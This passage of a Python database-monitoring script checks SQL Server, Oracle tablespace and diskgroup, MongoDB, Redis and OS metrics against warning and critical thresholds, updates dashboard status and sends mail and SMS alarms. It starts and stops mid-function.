                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'repl_delay',dg_delay,'replication delay ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('repl',1,host,port,create_time,'repl',mrp_status,'ok')
                        func.update_db_status('repl_delay',1,host,port,create_time,'repl_delay',dg_delay,'ok')
    else:
        pass
def get_alarm_sqlserver_status():
    """Raise or clear alarms for every monitored SQL Server instance.

    Joins the latest ``sqlserver_status`` snapshot with its alarm
    configuration (``db_cfg_sqlserver``) and, per server:

      * sends a critical alarm and marks all dependent dashboard metrics
        unknown (-1) when the instance is unreachable;
      * otherwise, for each enabled alarm switch, classifies ``processes``,
        ``processes_running`` and ``processes_waits`` against the configured
        warning/critical thresholds;
      * records the outcome via ``func.update_db_status`` and notifies
        through ``func.add_alarm`` / ``func.check_if_ok``, falling back to
        the common mail/SMS recipient lists when none are configured.
    """
    sql="select a.server_id,a.connect,a.processes,a.processes_running,a.processes_waits,a.create_time,a.host,a.port,b.alarm_processes,b.alarm_processes_running,alarm_processes_waits,b.threshold_warning_processes,b.threshold_warning_processes_running,b.threshold_warning_processes_waits,b.threshold_critical_processes,threshold_critical_processes_running,threshold_critical_processes_waits,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'sqlserver' as db_type from sqlserver_status a, db_cfg_sqlserver b where a.server_id=b.id;"
    result=func.mysql_query(sql)
    if result != 0:
        for line in result:
            server_id=line[0]
            connect=line[1]
            processes=line[2]
            processes_running=line[3]
            processes_waits=line[4]
            create_time=line[5]
            host=line[6]
            port=line[7]
            alarm_processes=line[8]
            alarm_processes_running=line[9]
            alarm_processes_waits=line[10]
            threshold_warning_processes=line[11]
            threshold_warning_processes_running=line[12]
            threshold_warning_processes_waits=line[13]
            threshold_critical_processes=line[14]
            threshold_critical_processes_running=line[15]
            threshold_critical_processes_waits=line[16]
            send_mail=line[17]
            send_mail_to_list=line[18]
            send_sms=line[19]
            send_sms_to_list=line[20]
            tags=line[21]
            db_type=line[22]
            # Fall back to the globally configured recipients when this
            # server has no mail/SMS list of its own.
            if send_mail_to_list is None or send_mail_to_list.strip()=='':
                send_mail_to_list = mail_to_list_common
            if send_sms_to_list is None or send_sms_to_list.strip()=='':
                send_sms_to_list = sms_to_list_common
            if connect != 1:
                # Instance unreachable: raise a critical alarm, then flag
                # every dependent metric as unknown (-1) on the dashboard.
                send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
                send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
                func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','sqlserver server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
                func.update_db_status('sessions','-1',host,port,'','','','')
                func.update_db_status('actives','-1',host,port,'','','','')
                func.update_db_status('waits','-1',host,port,'','','','')
                func.update_db_status('repl','-1',host,port,'','','','')
                func.update_db_status('repl_delay','-1',host,port,'','','','')
            else:
                func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','sqlserver server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
                # Total process count -> 'sessions' dashboard slot.
                if int(alarm_processes)==1:
                    if int(processes)>=int(threshold_critical_processes):
                        send_mail = func.update_send_mail_status(server_id,db_type,'processes',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'processes',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes',processes,'critical','too many processes',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('sessions',3,host,port,create_time,'processes',processes,'critical')
                    elif int(processes)>=int(threshold_warning_processes):
                        send_mail = func.update_send_mail_status(server_id,db_type,'processes',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'processes',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes',processes,'warning','too many processes',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('sessions',2,host,port,create_time,'processes',processes,'warning')
                    else:
                        func.update_db_status('sessions',1,host,port,create_time,'processes',processes,'ok')
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'processes',processes,'processes ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                # Running process count -> 'actives' dashboard slot.
                if int(alarm_processes_running)==1:
                    if int(processes_running)>=int(threshold_critical_processes_running):
                        send_mail = func.update_send_mail_status(server_id,db_type,'processes_running',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'processes_running',send_sms,send_sms_max_count)
                        # BUGFIX: was the undefined name 'processes_runnging' (NameError).
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_running',processes_running,'critical','too many processes running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('actives',3,host,port,create_time,'processes_running',processes_running,'critical')
                    elif int(processes_running)>=int(threshold_warning_processes_running):
                        send_mail = func.update_send_mail_status(server_id,db_type,'processes_running',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'processes_running',send_sms,send_sms_max_count)
                        # BUGFIX: severity was 'critical' in this warning branch,
                        # contradicting the 'warning' status recorded just below.
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_running',processes_running,'warning','too many processes running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('actives',2,host,port,create_time,'processes_running',processes_running,'warning')
                    else:
                        func.update_db_status('actives',1,host,port,create_time,'processes_running',processes_running,'ok')
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'processes_running',processes_running,'processes running ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                # Waiting process count -> 'waits' dashboard slot.
                if int(alarm_processes_waits)==1:
                    if int(processes_waits)>=int(threshold_critical_processes_waits):
                        send_mail = func.update_send_mail_status(server_id,db_type,'processes_waits',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'processes_waits',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_waits',processes_waits,'critical','too many processes waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('waits',3,host,port,create_time,'processes_waits',processes_waits,'critical')
                    elif int(processes_waits)>=int(threshold_warning_processes_waits):
                        send_mail = func.update_send_mail_status(server_id,db_type,'processes_waits',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'processes_waits',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_waits',processes_waits,'warning','too many processes waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('waits',2,host,port,create_time,'processes_waits',processes_waits,'warning')
                    else:
                        func.update_db_status('waits',1,host,port,create_time,'processes_waits',processes_waits,'ok')
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'processes_waits',processes_waits,'processes waits ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
    else:
        pass
def get_alarm_oracle_tablespace():
    """Scan Oracle tablespace usage and raise/clear usage alarms.

    Joins the collected ``oracle_tablespace`` rows with the per-server alarm
    configuration (``db_cfg_oracle``); when tablespace alarming is enabled
    for a server, classifies each tablespace's maximum usage rate as
    critical / warning / ok, updating the dashboard status and sending
    mail/SMS notifications accordingly.
    """
    sql = """SELECT a.server_id,
                    a.tablespace_name,
                    a.total_size,
                    a.used_size,
                    CONVERT(a.max_rate, DECIMAL(6,2)) as max_rate,
                    a.create_time,
                    b. HOST,
                    b. PORT,
                    b.alarm_tablespace,
                    b.threshold_warning_tablespace,
                    b.threshold_critical_tablespace,
                    b.send_mail,
                    b.send_mail_to_list,
                    b.send_sms,
                    b.send_sms_to_list,
                    b.tags,
                    'oracle' AS db_type
             FROM oracle_tablespace a, db_cfg_oracle b
             WHERE a.server_id = b.id
             ORDER BY max_rate desc """
    result = func.mysql_query(sql)
    if result == 0:
        return
    for row in result:
        (server_id, tablespace_name, total_size, used_size, max_rate,
         create_time, host, port, alarm_tablespace,
         threshold_warning_tablespace, threshold_critical_tablespace,
         send_mail, send_mail_to_list, send_sms, send_sms_to_list,
         tags, db_type) = row
        # Default to the shared recipient lists when none are configured.
        if not (send_mail_to_list and send_mail_to_list.strip()):
            send_mail_to_list = mail_to_list_common
        if not (send_sms_to_list and send_sms_to_list.strip()):
            send_sms_to_list = sms_to_list_common
        if int(alarm_tablespace) != 1:
            continue
        metric = 'tablespace(%s)' % (tablespace_name)
        if int(max_rate) >= int(threshold_critical_tablespace):
            send_mail = func.update_send_mail_status(server_id, db_type, metric, send_mail, send_mail_max_count)
            send_sms = func.update_send_sms_status(server_id, db_type, metric, send_sms, send_sms_max_count)
            func.add_alarm(server_id, tags, host, port, create_time, db_type, metric, max_rate, 'critical', 'tablespace %s usage reach %s' % (tablespace_name, max_rate), send_mail, send_mail_to_list, send_sms, send_sms_to_list)
            func.update_db_status('tablespace', 3, host, port, create_time, metric, max_rate, 'critical')
        elif int(max_rate) >= int(threshold_warning_tablespace):
            send_mail = func.update_send_mail_status(server_id, db_type, metric, send_mail, send_mail_max_count)
            send_sms = func.update_send_sms_status(server_id, db_type, metric, send_sms, send_sms_max_count)
            func.add_alarm(server_id, tags, host, port, create_time, db_type, metric, max_rate, 'warning', 'tablespace %s usage reach %s' % (tablespace_name, max_rate), send_mail, send_mail_to_list, send_sms, send_sms_to_list)
            func.update_db_status('tablespace', 2, host, port, create_time, metric, max_rate, 'warning')
        else:
            func.check_if_ok(server_id, tags, host, port, create_time, db_type, metric, max_rate, 'tablespace %s usage ok' % (tablespace_name), send_mail, send_mail_to_list, send_sms, send_sms_to_list)
            func.update_db_status('tablespace', 1, host, port, create_time, 'tablespace', 'max(%s:%s)' % (tablespace_name, max_rate), 'ok')
def get_alarm_oracle_diskgroup():
    """Raise or clear alarms for Oracle ASM diskgroup space usage.

    Joins ``oracle_diskgroup`` rows with the per-server alarm configuration
    (``db_cfg_oracle``); the SQL already filters to diskgroups at or above
    the warning threshold.  When ASM-space alarming is enabled, classifies
    each diskgroup's usage rate as critical / warning / ok, updating the
    dashboard status and sending mail/SMS notifications accordingly.
    """
    sql = """SELECT a.server_id,
                    a.diskgroup_name,
                    a.total_mb,
                    a.free_mb,
                    CONVERT(a.used_rate, DECIMAL(5,2)) as used_rate,
                    a.create_time,
                    b.HOST,
                    b.PORT,
                    b.alarm_asm_space,
                    b.threshold_warning_asm_space,
                    b.threshold_critical_asm_space,
                    b.send_mail,
                    b.send_mail_to_list,
                    b.send_sms,
                    b.send_sms_to_list,
                    b.tags,
                    'oracle' AS db_type
             FROM oracle_diskgroup a, db_cfg_oracle b
             WHERE a.server_id = b.id
             and CONVERT(a.used_rate, DECIMAL(5,2)) >= b.threshold_warning_asm_space
             ORDER BY used_rate desc """
    result=func.mysql_query(sql)
    if result != 0:
        for line in result:
            server_id=line[0]
            diskgroup_name=line[1]
            total_mb=line[2]
            free_mb=line[3]
            used_rate=line[4]
            create_time=line[5]
            host=line[6]
            port=line[7]
            alarm_asm_space=line[8]
            threshold_warning_asm_space=line[9]
            threshold_critical_asm_space=line[10]
            send_mail=line[11]
            send_mail_to_list=line[12]
            send_sms=line[13]
            send_sms_to_list=line[14]
            tags=line[15]
            db_type=line[16]
            # Fall back to the shared recipient lists when none configured.
            if send_mail_to_list is None or send_mail_to_list.strip()=='':
                send_mail_to_list = mail_to_list_common
            if send_sms_to_list is None or send_sms_to_list.strip()=='':
                send_sms_to_list = sms_to_list_common
            if int(alarm_asm_space)==1:
                if int(used_rate) >= int(threshold_critical_asm_space):
                    send_mail = func.update_send_mail_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_mail,send_mail_max_count)
                    send_sms = func.update_send_sms_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_sms,send_sms_max_count)
                    func.add_alarm(server_id,tags,host,port,create_time,db_type,'diskgroup(%s)' %(diskgroup_name),used_rate,'critical','diskgroup %s usage reach %s' %(diskgroup_name,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                    func.update_db_status('diskgroup',3,host,port,create_time,'diskgroup(%s)' %(diskgroup_name),used_rate,'critical')
                elif int(used_rate) >= int(threshold_warning_asm_space):
                    send_mail = func.update_send_mail_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_mail,send_mail_max_count)
                    send_sms = func.update_send_sms_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_sms,send_sms_max_count)
                    func.add_alarm(server_id,tags,host,port,create_time,db_type,'diskgroup(%s)' %(diskgroup_name),used_rate,'warning','diskgroup %s usage reach %s' %(diskgroup_name,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                    func.update_db_status('diskgroup',2,host,port,create_time,'diskgroup(%s)' %(diskgroup_name),used_rate,'warning')
                else:
                    # BUGFIX: recovery message previously said 'tablespace ... ok'
                    # (copy-paste from the tablespace check); this is a diskgroup.
                    func.check_if_ok(server_id,tags,host,port,create_time,db_type,'diskgroup(%s)' %(diskgroup_name),used_rate,'diskgroup %s usage ok' %(diskgroup_name),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                    func.update_db_status('diskgroup',1,host,port,create_time,'diskgroup','max(%s:%s)' %(diskgroup_name,used_rate),'ok')
    else:
        pass
def get_alarm_mongodb_status():
    """Raise or clear alarms for every monitored MongoDB instance.

    Joins the latest ``mongodb_status`` snapshot with its alarm
    configuration (``db_cfg_mongodb``) and, per server:

      * sends a critical alarm and marks dependent dashboard metrics
        unknown (-1) when the instance is unreachable;
      * otherwise, for each enabled alarm switch, classifies current
        connections, global-lock active clients and global-lock current
        queue against the configured warning/critical thresholds;
      * records results via ``func.update_db_status`` and notifies through
        ``func.add_alarm`` / ``func.check_if_ok``, falling back to the
        common mail/SMS recipient lists when none are configured.
    """
    sql = "select a.server_id,a.connect,a.connections_current,a.globalLock_activeClients,a.globalLock_currentQueue,a.create_time,b.host,b.port,b.alarm_connections_current,b.alarm_active_clients,b.alarm_current_queue,b.threshold_warning_connections_current,b.threshold_critical_connections_current,b.threshold_warning_active_clients,b.threshold_critical_active_clients,b.threshold_warning_current_queue,b.threshold_critical_current_queue,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'mongodb' as db_type from mongodb_status a, db_cfg_mongodb b where a.server_id=b.id;"
    result=func.mysql_query(sql)
    if result != 0:
        for line in result:
            server_id=line[0]
            connect=line[1]
            connections_current=line[2]
            globalLock_activeClients=line[3]
            globalLock_currentQueue=line[4]
            create_time=line[5]
            host=line[6]
            port=line[7]
            alarm_connections_current=line[8]
            alarm_active_clients=line[9]
            alarm_current_queue=line[10]
            threshold_warning_connections_current=line[11]
            threshold_critical_connections_current=line[12]
            threshold_warning_active_clients=line[13]
            threshold_critical_active_clients=line[14]
            threshold_warning_current_queue=line[15]
            threshold_critical_current_queue=line[16]
            send_mail=line[17]
            send_mail_to_list=line[18]
            send_sms=line[19]
            send_sms_to_list=line[20]
            tags=line[21]
            db_type=line[22]
            # Fall back to the shared recipient lists when none configured.
            if send_mail_to_list is None or send_mail_to_list.strip()=='':
                send_mail_to_list = mail_to_list_common
            if send_sms_to_list is None or send_sms_to_list.strip()=='':
                send_sms_to_list = sms_to_list_common
            if connect != 1:
                # Instance unreachable: raise a critical alarm, then flag
                # every dependent metric as unknown (-1) on the dashboard.
                send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
                send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
                func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','mongodb server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
                func.update_db_status('sessions','-1',host,port,'','','','')
                func.update_db_status('actives','-1',host,port,'','','','')
                func.update_db_status('waits','-1',host,port,'','','','')
                func.update_db_status('repl','-1',host,port,'','','','')
                func.update_db_status('repl_delay','-1',host,port,'','','','')
            else:
                func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','mongodb server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
                # Current connections -> 'sessions' dashboard slot.
                if int(alarm_connections_current)==1:
                    if int(connections_current) >= int(threshold_critical_connections_current):
                        send_mail = func.update_send_mail_status(server_id,db_type,'connections_current',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'connections_current',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'critical','too many connections current',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('sessions',3,host,port,create_time,'connections_current',connections_current,'critical')
                    elif int(connections_current) >= int(threshold_warning_connections_current):
                        send_mail = func.update_send_mail_status(server_id,db_type,'connections_current',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'connections_current',send_sms,send_sms_max_count)
                        # BUGFIX: a duplicate add_alarm with severity 'critical'
                        # used to fire here as well; only the warning belongs.
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'warning','too many connections current',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('sessions',2,host,port,create_time,'connections_current',connections_current,'warning')
                    else:
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'connections current ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('sessions',1,host,port,create_time,'connections_current',connections_current,'ok')
                # Global-lock active clients -> 'actives' dashboard slot.
                if int(alarm_active_clients)==1:
                    if int(globalLock_activeClients) >= int(threshold_critical_active_clients):
                        send_mail = func.update_send_mail_status(server_id,db_type,'active_clients',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'active_clients',send_sms,send_sms_max_count)
                        # BUGFIX: a stray add_alarm about connections_current
                        # used to fire here; this branch is about active clients.
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'active_clients',globalLock_activeClients,'critical','too many active clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('actives',3,host,port,create_time,'active_clients',globalLock_activeClients,'critical')
                    elif int(globalLock_activeClients) >= int(threshold_warning_active_clients):
                        send_mail = func.update_send_mail_status(server_id,db_type,'active_clients',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'active_clients',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'active_clients',globalLock_activeClients,'warning','too many active clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('actives',2,host,port,create_time,'active_clients',globalLock_activeClients,'warning')
                    else:
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'active_clients',globalLock_activeClients,'active clients ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('actives',1,host,port,create_time,'active_clients',globalLock_activeClients,'ok')
                # Global-lock current queue -> 'waits' dashboard slot.
                if int(alarm_current_queue)==1:
                    if int(globalLock_currentQueue) >= int(threshold_critical_current_queue):
                        send_mail = func.update_send_mail_status(server_id,db_type,'current_queue',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'current_queue',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'current_queue',globalLock_currentQueue,'critical','too many current queue',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('waits',3,host,port,create_time,'current_queue',globalLock_currentQueue,'critical')
                    elif int(globalLock_currentQueue) >= int(threshold_warning_current_queue):
                        send_mail = func.update_send_mail_status(server_id,db_type,'current_queue',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'current_queue',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'current_queue',globalLock_currentQueue,'warning','too many current queue',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('waits',2,host,port,create_time,'current_queue',globalLock_currentQueue,'warning')
                    else:
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'current_queue',globalLock_currentQueue,'current queue ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('waits',1,host,port,create_time,'current_queue',globalLock_currentQueue,'ok')
    else:
        pass
def get_alarm_redis_status():
    """Raise or clear alarms for every monitored Redis instance.

    Joins the latest ``redis_status`` snapshot with its alarm configuration
    (``db_cfg_redis``).  An unreachable instance produces a critical alarm
    and marks its dependent dashboard metrics unknown (-1); otherwise each
    enabled metric (connected clients, commands processed, blocked clients)
    is classified against its warning/critical thresholds and the outcome
    is recorded and notified via the ``func`` helpers.
    """
    sql = "select a.server_id,a.connect,a.connected_clients,a.current_commands_processed,a.blocked_clients,a.create_time,b.host,b.port,b.alarm_connected_clients,b.alarm_command_processed,b.alarm_blocked_clients,b.threshold_warning_connected_clients,b.threshold_critical_connected_clients,b.threshold_warning_command_processed,b.threshold_critical_command_processed,b.threshold_warning_blocked_clients,b.threshold_critical_blocked_clients,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'redis' as db_type from redis_status a, db_cfg_redis b where a.server_id=b.id ;"
    result = func.mysql_query(sql)
    if result == 0:
        return
    for row in result:
        (server_id, connect, connected_clients, current_commands_processed,
         blocked_clients, create_time, host, port,
         alarm_connected_clients, alarm_command_processed, alarm_blocked_clients,
         threshold_warning_connected_clients, threshold_critical_connected_clients,
         threshold_warning_command_processed, threshold_critical_command_processed,
         threshold_warning_blocked_clients, threshold_critical_blocked_clients,
         send_mail, send_mail_to_list, send_sms, send_sms_to_list,
         tags, db_type) = row
        # Default to the shared recipient lists when none are configured.
        if not (send_mail_to_list and send_mail_to_list.strip()):
            send_mail_to_list = mail_to_list_common
        if not (send_sms_to_list and send_sms_to_list.strip()):
            send_sms_to_list = sms_to_list_common
        if connect != 1:
            # Instance down: critical alarm, dependent metrics unknown (-1).
            send_mail = func.update_send_mail_status(server_id, db_type, 'connect', send_mail, send_mail_max_count)
            send_sms = func.update_send_sms_status(server_id, db_type, 'connect', send_sms, send_sms_max_count)
            func.add_alarm(server_id, tags, host, port, create_time, db_type, 'connect', 'down', 'critical', 'redis server down', send_mail, send_mail_to_list, send_sms, send_sms_to_list)
            func.update_db_status('connect', '3', host, port, create_time, 'connect', 'down', 'critical')
            for slot in ('sessions', 'actives', 'waits', 'repl', 'repl_delay'):
                func.update_db_status(slot, '-1', host, port, '', '', '', '')
            continue
        func.check_if_ok(server_id, tags, host, port, create_time, db_type, 'connect', 'up', 'redis server up', send_mail, send_mail_to_list, send_sms, send_sms_to_list)
        func.update_db_status('connect', '1', host, port, create_time, 'connect', 'up', 'ok')
        # Connected clients -> 'sessions' dashboard slot.
        if int(alarm_connected_clients) == 1:
            if int(connected_clients) >= int(threshold_critical_connected_clients):
                send_mail = func.update_send_mail_status(server_id, db_type, 'connected_clients', send_mail, send_mail_max_count)
                send_sms = func.update_send_sms_status(server_id, db_type, 'connected_clients', send_sms, send_sms_max_count)
                func.add_alarm(server_id, tags, host, port, create_time, db_type, 'connected_clients', connected_clients, 'critical', 'too many connected clients', send_mail, send_mail_to_list, send_sms, send_sms_to_list)
                func.update_db_status('sessions', 3, host, port, create_time, 'connected_clients', connected_clients, 'critical')
            elif int(connected_clients) >= int(threshold_warning_connected_clients):
                send_mail = func.update_send_mail_status(server_id, db_type, 'connected_clients', send_mail, send_mail_max_count)
                send_sms = func.update_send_sms_status(server_id, db_type, 'connected_clients', send_sms, send_sms_max_count)
                func.add_alarm(server_id, tags, host, port, create_time, db_type, 'connected_clients', connected_clients, 'warning', 'too many connected clients', send_mail, send_mail_to_list, send_sms, send_sms_to_list)
                func.update_db_status('sessions', 2, host, port, create_time, 'connected_clients', connected_clients, 'warning')
            else:
                func.check_if_ok(server_id, tags, host, port, create_time, db_type, 'connected_clients', connected_clients, 'connected clients ok', send_mail, send_mail_to_list, send_sms, send_sms_to_list)
                func.update_db_status('sessions', 1, host, port, create_time, 'connected_clients', connected_clients, 'ok')
        # Commands processed per interval -> 'actives' dashboard slot.
        if int(alarm_command_processed) == 1:
            if int(current_commands_processed) >= int(threshold_critical_command_processed):
                send_mail = func.update_send_mail_status(server_id, db_type, 'command_processed', send_mail, send_mail_max_count)
                send_sms = func.update_send_sms_status(server_id, db_type, 'command_processed', send_sms, send_sms_max_count)
                func.add_alarm(server_id, tags, host, port, create_time, db_type, 'command_processed', current_commands_processed, 'critical', 'too many command processed', send_mail, send_mail_to_list, send_sms, send_sms_to_list)
                func.update_db_status('actives', 3, host, port, create_time, 'command_processed', current_commands_processed, 'critical')
            elif int(current_commands_processed) >= int(threshold_warning_command_processed):
                send_mail = func.update_send_mail_status(server_id, db_type, 'command_processed', send_mail, send_mail_max_count)
                send_sms = func.update_send_sms_status(server_id, db_type, 'command_processed', send_sms, send_sms_max_count)
                func.add_alarm(server_id, tags, host, port, create_time, db_type, 'command_processed', current_commands_processed, 'warning', 'too many command processed', send_mail, send_mail_to_list, send_sms, send_sms_to_list)
                func.update_db_status('actives', 2, host, port, create_time, 'command_processed', current_commands_processed, 'warning')
            else:
                func.check_if_ok(server_id, tags, host, port, create_time, db_type, 'command_processed', current_commands_processed, 'command processed ok', send_mail, send_mail_to_list, send_sms, send_sms_to_list)
                func.update_db_status('actives', 1, host, port, create_time, 'command_processed', current_commands_processed, 'ok')
        # Blocked clients -> 'waits' dashboard slot.
        if int(alarm_blocked_clients) == 1:
            if int(blocked_clients) >= int(threshold_critical_blocked_clients):
                send_mail = func.update_send_mail_status(server_id, db_type, 'blocked_clients', send_mail, send_mail_max_count)
                send_sms = func.update_send_sms_status(server_id, db_type, 'blocked_clients', send_sms, send_sms_max_count)
                func.add_alarm(server_id, tags, host, port, create_time, db_type, 'blocked_clients', blocked_clients, 'critical', 'too many blocked clients', send_mail, send_mail_to_list, send_sms, send_sms_to_list)
                func.update_db_status('waits', 3, host, port, create_time, 'blocked_clients', blocked_clients, 'critical')
            elif int(blocked_clients) >= int(threshold_warning_blocked_clients):
                send_mail = func.update_send_mail_status(server_id, db_type, 'blocked_clients', send_mail, send_mail_max_count)
                send_sms = func.update_send_sms_status(server_id, db_type, 'blocked_clients', send_sms, send_sms_max_count)
                func.add_alarm(server_id, tags, host, port, create_time, db_type, 'blocked_clients', blocked_clients, 'warning', 'too many blocked clients', send_mail, send_mail_to_list, send_sms, send_sms_to_list)
                func.update_db_status('waits', 2, host, port, create_time, 'blocked_clients', blocked_clients, 'warning')
            else:
                func.check_if_ok(server_id, tags, host, port, create_time, db_type, 'blocked_clients', blocked_clients, 'blocked clients ok', send_mail, send_mail_to_list, send_sms, send_sms_to_list)
                func.update_db_status('waits', 1, host, port, create_time, 'blocked_clients', blocked_clients, 'ok')
def get_alarm_os_status():
    """Raise or clear alarms for every monitored OS host.

    Joins the latest ``os_status`` snapshot with its alarm configuration
    (``db_cfg_os``) and, per host:

      * sends a critical alarm and marks dependent dashboard metrics
        unknown (-1) when the SNMP agent is unreachable;
      * otherwise, for each enabled alarm switch, classifies process count,
        1-minute load, CPU idle (thresholds are configured as CPU *usage*
        and converted to idle here) and memory usage against the configured
        warning/critical thresholds;
      * records results via ``func.update_db_status`` and notifies through
        ``func.add_alarm`` / ``func.check_if_ok``, falling back to the
        common mail/SMS recipient lists when none are configured.

    Note: OS rows have no numeric server id, so ``host`` is used as the key
    for the mail/SMS throttling counters and ``server_id`` is fixed at 0.
    """
    sql = "select a.ip,a.hostname,a.snmp,a.process,a.load_1,a.cpu_idle_time,a.mem_usage_rate,a.create_time,b.tags,b.alarm_os_process,b.alarm_os_load,b.alarm_os_cpu,b.alarm_os_memory,b.threshold_warning_os_process,b.threshold_critical_os_process,b.threshold_warning_os_load,b.threshold_critical_os_load,b.threshold_warning_os_cpu,b.threshold_critical_os_cpu,b.threshold_warning_os_memory,b.threshold_critical_os_memory,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list from os_status a,db_cfg_os b where a.ip=b.host"
    result=func.mysql_query(sql)
    if result != 0:
        for line in result:
            host=line[0]
            hostname=line[1]
            snmp=line[2]
            process=line[3]
            load_1=line[4]
            cpu_idle=line[5]
            memory_usage=line[6]
            create_time=line[7]
            tags=line[8]
            alarm_os_process=line[9]
            alarm_os_load=line[10]
            alarm_os_cpu=line[11]
            alarm_os_memory=line[12]
            threshold_warning_os_process=line[13]
            threshold_critical_os_process=line[14]
            threshold_warning_os_load=line[15]
            threshold_critical_os_load=line[16]
            threshold_warning_os_cpu=line[17]
            threshold_critical_os_cpu=line[18]
            threshold_warning_os_memory=line[19]
            threshold_critical_os_memory=line[20]
            send_mail=line[21]
            send_mail_to_list=line[22]
            send_sms=line[23]
            send_sms_to_list=line[24]
            server_id=0
            db_type="os"
            port=''
            # Fall back to the shared recipient lists when none configured.
            if send_mail_to_list is None or send_mail_to_list.strip()=='':
                send_mail_to_list = mail_to_list_common
            if send_sms_to_list is None or send_sms_to_list.strip()=='':
                send_sms_to_list = sms_to_list_common
            if snmp != 1:
                # SNMP agent unreachable: critical alarm, then flag every
                # dependent metric as unknown (-1) on the dashboard.
                send_mail = func.update_send_mail_status(host,db_type,'snmp_server',send_mail,send_mail_max_count)
                send_sms = func.update_send_sms_status(host,db_type,'snmp_server',send_sms,send_sms_max_count)
